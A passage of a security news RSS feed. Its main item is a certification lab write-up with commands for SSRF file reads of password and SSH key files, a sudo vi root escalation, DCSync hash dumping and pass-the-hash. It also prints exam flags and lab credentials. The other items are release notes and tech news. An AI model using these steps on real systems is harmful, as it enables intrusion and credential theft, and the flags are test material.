understand JWT structure deeply, and practice SSRF + XXE payloads from PortSwigger Web Security Academy. Everything else in this exam flows naturally from those skills.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*zVMUVg071wNCj_x12UoN3A.jpeg"></figure><p><em>If you found this useful, feel free to connect on </em><a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a><em> or check out my tools on </em><a href="https://github.com/alisalive"><em>GitHub</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=20c6bd74e675" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/web-rta-exam-writeup-passed-cyberwarfare-labs-20c6bd74e675">Web-RTA Exam Writeup — Passed | CyberWarFare Labs</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CRTA Exam Writeup — Passed | CyberWarFare Labs]]></title>
<description><![CDATA[Certification: CRTA (Certified Red Team Analyst) Issued by: CyberWarFare Labs (CWL) Difficulty: Intermediate Format: Practical, black-box exam with a live lab environment Author: Shikhali JamalzadeIntroductionThe CRTA (Certified Red Team Analyst) exam by CyberWarFare Labs is a fully hands-on, bla...]]></description>
<link>https://tsecurity.de/de/3610156/hacking/crta-exam-writeup-passed-cyberwarfare-labs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610156/hacking/crta-exam-writeup-passed-cyberwarfare-labs/</guid>
<pubDate>Fri, 19 Jun 2026 13:09:26 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*4ACa-GwMDW0jxV1iDakOBw.png"></figure><h4><strong>Certification:</strong> CRTA (Certified Red Team Analyst) <br><strong>Issued by:</strong> CyberWarFare Labs (CWL) <br><strong>Difficulty:</strong> Intermediate <br><strong>Format:</strong> Practical, black-box exam with a live lab environment <br><strong>Author:</strong> <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a></h4><h3>Introduction</h3><p>The CRTA (Certified Red Team Analyst) exam by CyberWarFare Labs is a fully hands-on, black-box red team assessment. There are no multiple-choice questions. You either root the machine and collect the flags — or you don’t pass.</p><p>The exam consists of a live VPN-connected environment. Your goal: compromise a multi-layer infrastructure, escalate privileges, move laterally, and ultimately retrieve a secret.xml file from the Domain Controller's Administrator Desktop.</p><p>This writeup documents the full attack chain I used to pass the exam — step by step. If you’re preparing for CRTA, this should give you a clear picture of what to expect and how to approach it.</p><blockquote><strong><em>Disclaimer:</em></strong><em> This writeup is published after the exam was passed. Nothing here compromises exam integrity — CWL explicitly allows sharing methodology. No credentials or flags are disclosed in full.</em></blockquote><h3>Exam Environment</h3><pre>VPN Scope:         172.26.10.0/24<br>Out of scope:      172.26.10.1 (gateway — do not touch)<br>Initial target:    172.26.10.11<br>Internal network:  10.10.10.0/24 (discovered later)<br>Domain Controller: 10.10.10.100</pre><p>The lab is accessed via an .ovpn file provided after purchasing the exam. Once connected, you begin with a completely blank slate — no hints, no starting point given explicitly.</p><h3>Phase 1 — Reconnaissance</h3><h3>Network Discovery</h3><p>After connecting to the VPN, the first step is always to identify live hosts:</p><p>bash</p><pre>nmap -sn 172.26.10.0/24</pre><p>This revealed one live host: 172.26.10.11</p><h3>Port Scanning</h3><p>bash</p><pre>nmap -sV -sC -p- 172.26.10.11 --min-rate 5000 -oN nmap_full.txt</pre><p>Key open ports discovered:</p><pre>22/tcp    SSH   (OpenSSH)<br>23100/tcp HTTP  (Python Flask application)<br>8091/tcp  HTTP  (HotHost monitoring service)</pre><h3>Phase 2 — Web Application Analysis</h3><h3>Flask App on Port 23100</h3><p>Navigating to http://172.26.10.11:23100 revealed a Python Flask web application. Exploring the routes manually and with directory fuzzing, a critical endpoint was discovered:</p><pre>/fetch</pre><p>This endpoint accepted a URL parameter and fetched its content — a classic SSRF (Server-Side Request Forgery) setup.</p><p>bash</p><pre>curl "http://172.26.10.11:23100/fetch?url=http://127.0.0.1/"</pre><h3>SSRF → Local File Read</h3><p>The SSRF vulnerability allowed using the file:// URI scheme to read files from the host filesystem. The hostfs prefix was needed due to the application running inside a Docker container:</p><p>bash</p><pre>curl "http://172.26.10.11:23100/fetch?url=file:///hostfs/etc/passwd"</pre><p>This returned the /etc/passwd file of the host machine — not just the container. Scanning the output revealed a critical user:</p><pre>app-admin:x:1001:1001::/home/app-admin:/bin/bash</pre><p>Continuing to read sensitive files via SSRF:</p><p>bash</p><pre>curl "http://172.26.10.11:23100/fetch?url=file:///hostfs/home/app-admin/.ssh/id_rsa"<br>curl "http://172.26.10.11:23100/fetch?url=file:///hostfs/etc/app-config"</pre><p>After reading application configuration files through SSRF, the plaintext password for app-admin was found:</p><pre>app-admin : @dmin@123</pre><h3>Phase 3 — Initial Access via SSH</h3><p>With valid credentials, SSH access was straightforward:</p><p>bash</p><pre>ssh app-admin@172.26.10.11</pre><p>Successful login. We now have a shell on the target host.</p><h3>Phase 4 — Privilege Escalation</h3><h3>sudo -l</h3><p>The first command after any initial access:</p><p>bash</p><pre>sudo -l</pre><p>Output:</p><pre>User app-admin may run the following commands on this host:<br>    (ALL : ALL) NOPASSWD: /usr/bin/vi</pre><p>vi with sudo and NOPASSWD — a textbook GTFOBins escalation.</p><h3>GTFOBins — vi → root</h3><p>bash</p><pre>sudo /usr/bin/vi -c ':!/bin/bash'</pre><p>Inside vi, executing shell escape:</p><pre>:set shell=/bin/bash<br>:shell</pre><p>Or more directly:</p><pre>:!/bin/bash</pre><p>Root shell obtained on 172.26.10.11.</p><h3>Phase 5 — Docker Container Enumeration</h3><p>Now as root, the environment needed deeper exploration. Running processes and network interfaces revealed something important:</p><p>bash</p><pre>ip addr show<br>ifconfig<br>docker ps</pre><p>Two Docker containers were running on the host:</p><pre>Container    Service                    Port<br>HotHost      Monitoring service         8091 (internal)<br>Python app   Flask SSRF application     23100</pre><h3>HotHost Container (Port 8091)</h3><p>The HotHost monitoring service on port 8091 (not 23100 — this distinction matters for the exam flags) contained a configuration file:</p><p>bash</p><pre>docker exec -it &lt;hothost_container_id&gt; /bin/bash<br>cat /hothost.json</pre><p>hothost.json contained an MD5 hash for the database password:</p><pre>665a26fad71ea9ef3edf5f33195d4b31</pre><h3>Base64 Encoding of the Hash (Flag)</h3><p>One of the exam questions requires the Base64 encoding of this hash — but as binary, not as the hex string. The correct conversion:</p><p>bash</p><pre>echo "665a26fad71ea9ef3edf5f33195d4b31" | xxd -r -p | base64</pre><p>Result:</p><pre>Zlom+tceqe8+318zGV1LMQ==</pre><blockquote><strong><em>Key lesson:</em></strong><em> The exam asks for Base64 of the binary representation of the MD5 hash — not Base64 of the hex string. This tripped me up initially.</em></blockquote><h3>Phase 6 — Lateral Movement &amp; Network Pivoting</h3><h3>Discovering the Internal Network</h3><p>Reading the SSH auth logs revealed connections originating from an internal IP:</p><p>bash</p><pre>cat /var/log/auth.log | grep "Accepted"</pre><p>A recurring IP appeared: 10.10.10.20</p><p>This machine was on an internal network segment not visible from the exam’s initial VPN range. From the compromised host (172.26.10.11), this internal network was reachable.</p><h3>Enumerating 10.10.10.20</h3><p>bash</p><pre>nmap -sV -p- 10.10.10.20 --min-rate 3000<br>curl http://10.10.10.20/<br>gobuster dir -u http://10.10.10.20 -w /usr/share/wordlists/dirb/common.txt</pre><p>The /elfinder directory was discovered — a file manager interface.</p><h3>AD_Resources.txt</h3><p>Inside the elfinder directory, a file named AD_Resources.txt was found containing Active Directory credentials:</p><pre>sync_user@ent.corp / Summer@2025</pre><p>These credentials belonged to a domain user with replication privileges — the key to DCSync.</p><h3>Domain Controller at 10.10.10.100</h3><p>With domain credentials in hand, targeting the DC:</p><p>bash</p><pre>nmap -sV -p 445,88,389,636 10.10.10.100</pre><p>Confirmed: 10.10.10.100 is the Domain Controller for ent.corp.</p><h3>Phase 7 — DCSync Attack</h3><h3>impacket-secretsdump</h3><p>Using the sync_user credentials to perform a DCSync attack and dump all domain hashes:</p><p>bash</p><pre>impacket-secretsdump ent.corp/sync_user:'Summer@2025'@10.10.10.100</pre><p>The output contained all domain account NTLM hashes. The critical ones:</p><pre>krbtgt:502:aad3b435b51404eeaad3b435b51404ee:36405f88da713c31bbff52e57aea1f86:::<br>Administrator:500:aad3b435b51404eeaad3b435b51404ee:&lt;NT_HASH&gt;:::</pre><p>The krbtgt NT hash (36405f88da713c31bbff52e57aea1f86) is itself a flag in the exam.</p><h3>Phase 8 — Pass-the-Hash → Administrator Access</h3><h3>smbclient with Administrator Hash</h3><p>With the Administrator’s NT hash, Pass-the-Hash (PtH) gives direct access to the DC without knowing the plaintext password:</p><p>bash</p><pre>smbclient //10.10.10.100/C$ -U 'Administrator' --pw-nt-hash &lt;ADMINISTRATOR_NT_HASH&gt;</pre><h3>Retrieving secret.xml</h3><p>Navigating to the Administrator Desktop:</p><p>bash</p><pre>smb: \&gt; cd Users\Administrator\Desktop<br>smb: \Users\Administrator\Desktop\&gt; ls<br>smb: \Users\Administrator\Desktop\&gt; get secret.xml.txt</pre><p>secret.xml.txt retrieved. Exam objective complete.</p><h3>Attack Chain Summary</h3><pre>[VPN] → Nmap scan → 172.26.10.11<br>         ↓<br>[Port 23100] Flask App → /fetch endpoint → SSRF<br>         ↓<br>[SSRF] file:///hostfs/etc/passwd → credentials (app-admin:@dmin@123)<br>         ↓<br>[SSH] app-admin@172.26.10.11<br>         ↓<br>[sudo vi] GTFOBins → ROOT on 172.26.10.11<br>         ↓<br>[Docker] HotHost (port 8091) → hothost.json → MD5 hash<br>         ↓<br>[auth.log] → discovered 10.10.10.20<br>         ↓<br>[10.10.10.20] /elfinder → AD_Resources.txt → sync_user@ent.corp creds<br>         ↓<br>[DCSync] impacket-secretsdump → krbtgt + Administrator NT hashes<br>         ↓<br>[PtH] smbclient → C$\Users\Administrator\Desktop\secret.xml.txt ✅</pre><h3>Key Exam Flags</h3><pre>Flag                    What You Find<br>SSRF web route          /fetch<br>Host credentials        Via file:///hostfs/etc/passwd<br>HotHost TCP port        8091 (not 23100)<br>DB password hash        Zlom+tceqe8+318zGV1LMQ== (Base64 of binary MD5)<br>Internal pivot IP       10.10.10.20<br>Web directory on pivot  /elfinder<br>DC IP                   10.10.10.100<br>krbtgt NT hash          36405f88da713c31bbff52e57aea1f86<br>Final objective         secret.xml.txt from DC Desktop</pre><h3>Tools Used</h3><pre>nmap                  Port scanning and service detection<br>curl                  SSRF exploitation and web interaction<br>gobuster              Web directory fuzzing<br>ssh                   Initial access<br>vi (GTFOBins)         Privilege escalation<br>docker                Container enumeration<br>impacket-secretsdump  DCSync attack<br>smbclient             Pass-the-Hash, file retrieval<br>xxd + base64          Hash format conversion</pre><h3>Lessons Learned</h3><p><strong>SSRF isn’t just about HTTPS — test </strong><strong>file:// too.</strong> The file:// scheme with hostfs prefix to escape Docker containers is a classic lab trick. Know it.</p><p><strong>GTFOBins is not optional knowledge.</strong> sudo -l should be your second command after gaining any shell. Always check it.</p><p><strong>Log files are goldmines.</strong> /var/log/auth.log revealed the internal network. Enumerate everything on a compromised host.</p><p><strong>Hash math matters.</strong> The Base64-of-binary flag is easy to get wrong. Always confirm what encoding format the question is asking for.</p><p><strong>DCSync requires specific privileges.</strong> sync_user having replication rights isn't an accident — it's the intended path. When you find AD credentials, check what they can actually do before assuming they're useless.</p><h3>Final Thoughts</h3><p>CRTA is a well-constructed exam for anyone entering Active Directory offensive security. The attack chain feels realistic: web app → SSRF → SSH → privesc → lateral movement → DCSync → domain admin. This is the kind of chain you’ll see in real environments.</p><p>It’s not an OSCP — the scope is smaller and the hints are somewhat embedded in the lab design — but it’s a solid certification that proves you can chain vulnerabilities together in a live environment.</p><p>If you’re preparing: make sure you’re comfortable with SSRF exploitation, Docker container awareness, impacket tooling, and GTFOBins. Everything else follows from those foundations.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*aBXaEOwOSEU7RuDm8le8aA.jpeg"></figure><p><em>If you found this useful, feel free to connect on </em><a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a><em> or check out my tools on </em><a href="https://github.com/alisalive"><em>GitHub</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=d55e776c82e7" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/crta-exam-writeup-passed-cyberwarfare-lab-d55e776c82e7">CRTA Exam Writeup — Passed | CyberWarFare Labs</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Residential Proxies in the Wild]]></title>
<description><![CDATA[2026-06-09 • Infoblox
     • David Brunsdon, Nick Sundvall
    
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3607704/malware-trojaner-viren/residential-proxies-in-the-wild/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607704/malware-trojaner-viren/residential-proxies-in-the-wild/</guid>
<pubDate>Thu, 18 Jun 2026 14:18:27 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-06-09 • Infoblox
     • David Brunsdon, Nick Sundvall
    
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/3e9ecb0c-a331-4089-bbb3-033a07266258/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v5.01c]]></title>
<description><![CDATA[Version ++5.01c (release)

MacOS persistent mode now uses futex mode now too which increases speed
and reduces system call overhead (opt out with AFL_FAST_CHILD_SYNC) - this
requires a MacOS from 2024 onwards.
afl-fuzz

new adaptive MOpt! Much better than the outdated one we still had.
How good i...]]></description>
<link>https://tsecurity.de/de/3607079/it-security-tools/v501c/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607079/it-security-tools/v501c/</guid>
<pubDate>Thu, 18 Jun 2026 10:34:12 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Version ++5.01c (release)</h3>
<ul>
<li>MacOS persistent mode now uses futex mode now too which increases speed<br>
and reduces system call overhead (opt out with AFL_FAST_CHILD_SYNC) - this<br>
requires a MacOS from 2024 onwards.</li>
<li>afl-fuzz
<ul>
<li>new adaptive MOpt! Much better than the outdated one we still had.<br>
How good it is still needs to be seen but initially it seems to be<br>
better than standard havoc</li>
<li>enforce halt on UBSAN errors</li>
</ul>
</li>
<li>afl-cc:
<ul>
<li>enforce halt on UBSAN errors (AFL_USE_USBAN=1)</li>
<li>better cmplog on MacOS</li>
<li>removed unsupported LLVM version code paths from afl-cc and llvm passes</li>
<li>compcov: fixes for float splittings (thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ngg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ngg">@ngg</a>)</li>
</ul>
</li>
<li>nyx_mode:
<ul>
<li>fix nyx_mode issues (thanks to <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/morehouse/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/morehouse">@morehouse</a>)</li>
</ul>
</li>
<li>qemu_mode:
<ul>
<li>non-colliding coverage!</li>
<li>faster persistent fuzzing</li>
<li>minor bug fixes</li>
</ul>
</li>
<li>qemu_bridge:
<ul>
<li>new mode with current QEMU version, so plugins possible, new processors</li>
<li>sightly slower than qemu_mode</li>
<li>WIP!</li>
</ul>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.33.7]]></title>
<description><![CDATA[What's Changed

capture error for mapping by @javanlacerda in #5325
Guard Fuzzing Tasks Behind ENABLE_FUZZ_FOR_BOTS Feature Flag by @javanlacerda in #5328

Full Changelog: v2.33.6...v2.33.7]]></description>
<link>https://tsecurity.de/de/3605910/it-security-tools/v2337/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3605910/it-security-tools/v2337/</guid>
<pubDate>Wed, 17 Jun 2026 21:19:01 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>capture error for mapping by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/javanlacerda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/javanlacerda">@javanlacerda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4675114788" data-permission-text="Title is private" data-url="https://github.com/google/clusterfuzz/issues/5325" data-hovercard-type="pull_request" data-hovercard-url="/google/clusterfuzz/pull/5325/hovercard" href="https://github.com/google/clusterfuzz/pull/5325">#5325</a></li>
<li>Guard Fuzzing Tasks Behind ENABLE_FUZZ_FOR_BOTS Feature Flag by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/javanlacerda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/javanlacerda">@javanlacerda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4683933184" data-permission-text="Title is private" data-url="https://github.com/google/clusterfuzz/issues/5328" data-hovercard-type="pull_request" data-hovercard-url="/google/clusterfuzz/pull/5328/hovercard" href="https://github.com/google/clusterfuzz/pull/5328">#5328</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/google/clusterfuzz/compare/v2.33.6...v2.33.7"><tt>v2.33.6...v2.33.7</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Netflix has shared the highly anticipated trailer for Heartstopper Forever — and the final installment has an interactive feature for fans to enjoy]]></title>
<description><![CDATA[Heartstopper Forever is the final installment in Charlie and Nick's love story, and Netflix wants fans to be a huge part of it.]]></description>
<link>https://tsecurity.de/de/3604646/it-nachrichten/netflix-has-shared-the-highly-anticipated-trailer-for-heartstopper-forever-and-the-final-installment-has-an-interactive-feature-for-fans-to-enjoy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604646/it-nachrichten/netflix-has-shared-the-highly-anticipated-trailer-for-heartstopper-forever-and-the-final-installment-has-an-interactive-feature-for-fans-to-enjoy/</guid>
<pubDate>Wed, 17 Jun 2026 13:47:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Heartstopper Forever is the final installment in Charlie and Nick's love story, and Netflix wants fans to be a huge part of it.]]></content:encoded>
</item>
<item>
<title><![CDATA[Code like Hemingway]]></title>
<description><![CDATA[I was blessed with a terrific high school English teacher. Ms. Jewel was funny, kind, interesting, and tough on us. I can still spell “ecstasy” on the first try because of her. One of the more memorable lessons she taught was a “Hemingway and Fitzgerald” module. 



I loved the short stories of b...]]></description>
<link>https://tsecurity.de/de/3604137/ai-nachrichten/code-like-hemingway/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604137/ai-nachrichten/code-like-hemingway/</guid>
<pubDate>Wed, 17 Jun 2026 11:04:11 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>I was blessed with a terrific high school English teacher. Ms. Jewel was funny, kind, interesting, and tough on us. I can still spell “ecstasy” on the first try because of her. One of the more memorable lessons she taught was a “Hemingway and Fitzgerald” module. </p>



<p>I loved the short stories of both, but Hemingway’s work always stuck out for me. It’s cliché to say that Hemingway was terse, but we only say it because it is true. He could pack more into a page than most writers. He didn’t waste a syllable. </p>



<p>Software developers are soon going to have to take a lesson from Hemingway.</p>



<p>It’s not hard to be concise in code. You have to be, by design. The compiler won’t put up with any throat-clearing and jibber-jabber. You can’t meander. You have to use a very strict set of words and symbols, and you have to use them in a defined way. </p>



<p>Thanks to agentic development, <a href="https://www.infoworld.com/article/4096265/writing-code-is-so-over.html">we don’t write code anymore</a>. But we are writing for the agents. A lot. </p>



<h2 class="wp-block-heading">All about the spec</h2>



<p>Let me explain. Claude Code, Codex, Copilot, and the rest all love to be “spoken” to <a href="https://www.infoworld.com/article/4146579/markdown-is-now-a-first-class-coding-language-deal-with-it.html">in Markdown</a>. We used to define our code with unit tests and specifications written for humans. Now, it’s all about the spec. And the spec needs to be both complete and concise. </p>



<p>It needs to be complete in the sense that if you leave something out or forget to define something, the agent will very likely fill in the gaps for you. Forget a feature or requirement, and the agent will go off confidently and almost certainly in the wrong direction.</p>



<p>At the same time, you need to be concise. Because if you are too effusive, you may give the agent ideas that you don’t want it to have. If you write like Fitzgerald — lush and expansive —  the agent will be off and running in a direction you can’t be sure about. </p>



<p>Our compilers will stop cold if we aren’t precise and concise. Our agents? They will proceed with confidence, diligently producing a result that looks great but isn’t what we want.</p>



<p>So we need to learn to write like Hemingway and pack as much meaning into as few words as possible. Or, as Paul Graham said:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/paul_graham_tweet_08dac6.png" alt="paul graham tweet" class="wp-image-4185837" width="720" height="306" sizes="auto, (max-width: 720px) 100vw, 720px"></figure><p class="imageCredit">Foundry</p></div>



<h2 class="wp-block-heading">Let’s be clear</h2>



<p>For years, we’ve been writing semi-vague Jira tickets and expecting our fellow humans to fill in the gaps and “get the gist” of what we were trying to do. We don’t have that luxury anymore. Developers who aren’t able to move on from “Jira-speak” to “Agent-speak” are going to struggle. If we don’t follow Graham’s advice in writing those specs, who knows what we’ll get.</p>



<p>Maybe someday agents will know the ins and outs of our business well enough to “know what we mean,” but they can’t today. The time we used to spend coding now needs to be spent perfecting our new craft of writing precise specifications for our agents to execute.</p>



<p>Every <a href="https://en.wikipedia.org/wiki/Listicle">listicle</a> ever written on “How to be a Great Developer” says you need to be a great communicator — but that was communication with other humans. </p>



<p>Ms. Jewel always taught us that our writing is only as clear as our thinking. Our compilers forced us to write clearly. Our coding agents won’t do that. I’m sure there are many developers out there now who wish they had listened more closely to their high school English teacher.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Elon Musk’s unprecendented accumulation of wealth]]></title>
<description><![CDATA[IPO mints Musk as world’s first trillionaire – now SpaceX is public, it will be harder than ever not to have a stake in its future Hi and welcome to TechScape. Nick Robins-Early here, US tech and power reporter at the Guardian. I’m filling in for your usual host Blake Montgomery, who is out this ...]]></description>
<link>https://tsecurity.de/de/3603936/it-nachrichten/elon-musks-unprecendented-accumulation-of-wealth/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603936/it-nachrichten/elon-musks-unprecendented-accumulation-of-wealth/</guid>
<pubDate>Wed, 17 Jun 2026 09:33:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>IPO mints Musk as world’s first trillionaire – now SpaceX is public, it will be harder than ever not to have a stake in its future </p><p>Hi and welcome to TechScape. Nick Robins-Early here, US tech and power reporter at the Guardian. I’m filling in for your usual host Blake Montgomery, who is out this week on vacation.</p><p>Today, we’ll be talking about the <a href="https://www.theguardian.com/science/2026/jun/12/spacex-stock-price-ipo-spcx">historic SpaceX IPO</a> and the US government’s <a href="https://www.theguardian.com/technology/2026/jun/13/anthropic-disable-advanced-ai-models-us-government-order">surprise order to limit</a> the use of Anthropic’s most advanced AI model over cybersecurity concerns. I’ll also share a dispatch from Web Summit Rio, South America’s largest tech event.</p><p><a href="https://www.theguardian.com/science/2026/jun/12/spacex-stock-price-ipo-spcx">SpaceX makes largest ever stock market debut, minting Musk as a trillionaire</a></p><p><a href="https://www.theguardian.com/business/2026/jun/12/ai-ipos-stock-market">After SpaceX’s huge IPO, Americans’ financial future will be bound to AI</a></p><p><a href="https://www.theguardian.com/technology/2026/jun/12/elon-musk-spacex-net-worth">How much money did Elon Musk make in SpaceX’s stock market debut?</a></p> <a href="https://www.theguardian.com/technology/2026/jun/16/elon-musk-techscape">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4663: The hallway track at T-DOSE]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.
T-DOSE

TDOSE 2027


Mark you calendars #TDOSE 2027 on 5 and 6 June '27 in the Weeffabriek, Geldrop.




T-DOSE
Info Booth
Hackalot
Laptop Revive
Free Software Foundation Europe
Doeidag and Banray
Debian
Angry Nerds Podcast
Freie Software Freunde -...]]></description>
<link>https://tsecurity.de/de/3603360/podcasts/hpr4663-the-hallway-track-at-t-dose/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603360/podcasts/hpr4663-the-hallway-track-at-t-dose/</guid>
<pubDate>Wed, 17 Jun 2026 02:02:25 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>
<h1>T-DOSE</h1>

<h2>TDOSE 2027</h2>

<p>
Mark you calendars #TDOSE 2027 on 5 and 6 June '27 in the Weeffabriek, Geldrop.
</p>

<ul>

<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#TDOSE" rel="noopener noreferrer" target="_blank">T-DOSE</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#InfoBooth" rel="noopener noreferrer" target="_blank">Info Booth</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#Hackalot" rel="noopener noreferrer" target="_blank">Hackalot</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#LaptopRevive" rel="noopener noreferrer" target="_blank">Laptop Revive</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#FSFE" rel="noopener noreferrer" target="_blank">Free Software Foundation Europe</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#DoeidagBanray" rel="noopener noreferrer" target="_blank">Doeidag and Banray</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#Debian" rel="noopener noreferrer" target="_blank">Debian</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#AngryNerdsPodcast" rel="noopener noreferrer" target="_blank">Angry Nerds Podcast</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#FYMT" rel="noopener noreferrer" target="_blank">Freie Software Freunde - Free Your Model Train</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#HPR" rel="noopener noreferrer" target="_blank">Hacker Public Radio: The community Podcast</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#UBports" rel="noopener noreferrer" target="_blank">UBports</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#Adfinis" rel="noopener noreferrer" target="_blank">Adfinis</a></li>
<li><a href="https://hackerpublicradio.org/eps/hpr4663/index.html#credit" rel="noopener noreferrer" target="_blank">Credits</a></li>
</ul>

<h2>The Technical Dutch Open Source Event (T-DOSE)</h2>
<p>
<audio controls="" preload="none">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.ogg#t=40.000000,283.720000" type="audio/ogg">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.mp3#t=40.000000,283.720000" type="audio/mpeg">
</audio>
</p>
<p>
In <a href="https://hackerpublicradio.org/eps/hpr4641/index.html" rel="noopener noreferrer" target="_blank">
hpr4641 :: Technical Dutch Open Source Event (T-DOSE)</a>
, Ken interviewed Peter van Ginneken about the <a href="https://t-dose.org/" rel="noopener noreferrer" target="_blank">
T-DOSE</a>
conference.</p>

<blockquote>
The Technical Dutch Open Source Event (T-DOSE) is a free conference to promote the use and development of Open Source software. This event has is organised yearly since 2006 in the Brainport region, near Eindhoven, The Netherlands. During this event, Open Source projects, developers and visitors can exchange ideas and knowledge.</blockquote>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_1.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_1_tn.jpeg">
</a>

</p>

<p>
Peter van Ginneken Opens the Event.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_2.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_2_tn.jpeg">
</a>

</p>

<p>
We catch up with him at the start of Day 2.</p>

<h2>
Info Booth</h2>
<p>
<audio controls="" preload="none">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.ogg#t=283.720000,639.720000" type="audio/ogg">
<source src="https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr4663/hpr4663.mp3#t=283.720000,639.720000" type="audio/mpeg">
</audio>
</p>

<p>
The backbone of any event is the Info booth and catering.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_3.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_3_tn.jpeg">
</a>

</p>

<p>
Here we talk to Nick Hibma who when not serving on the Info Booth is treasurer of the T-DOSE organisation.</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_4.jpeg">
<img src="https://hackerpublicradio.org/eps/hpr4663/hpr4663_image_ext_4_tn.jpeg">
</a>

</p>

<p>
